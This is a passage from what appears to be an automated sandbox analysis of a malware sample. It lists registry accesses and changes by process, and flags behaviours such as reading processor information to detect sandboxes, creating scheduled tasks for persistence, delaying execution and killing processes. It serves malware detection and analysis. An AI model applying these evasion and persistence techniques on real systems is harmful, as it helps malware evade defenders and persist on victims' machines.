\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Zembra.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Zembra.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Zembra.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6732 schtasks.exe 10256 schtasks.exe 8096 schtasks.exe 7568 schtasks.exe 1336 schtasks.exe 7324 schtasks.exe 6456 schtasks.exe 5664 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 3764 timeout.exe 6160 timeout.exe -
Kills process with taskkill 17 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3052 taskkill.exe 5820 taskkill.exe 7200 taskkill.exe 6344 taskkill.exe 5776 taskkill.exe 13216 taskkill.exe 6844 taskkill.exe 8096 taskkill.exe 2472 taskkill.exe 7004 taskkill.exe 992 taskkill.exe 10056 taskkill.exe 8328 taskkill.exe 12752 taskkill.exe 16212 taskkill.exe 1904 taskkill.exe 6468 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
DrvInst.exemask_svc.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2432 = "Cuba Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1912 = "Russia TZ 10 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2161 = "Altai Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-352 = "FLE Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2511 = "Lord Howe Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2061 = "North Korea Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe -
Modifies registry class 48 IoCs
Processes:
MicrosoftEdge.exeSoftware-update-patc_579570356.sfx.exeExercitationem.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = eda47e9320aed701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Software-update-patc_579570356.sfx.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Software-update-patc_579570356.sfx.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = eda47e9320aed701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local 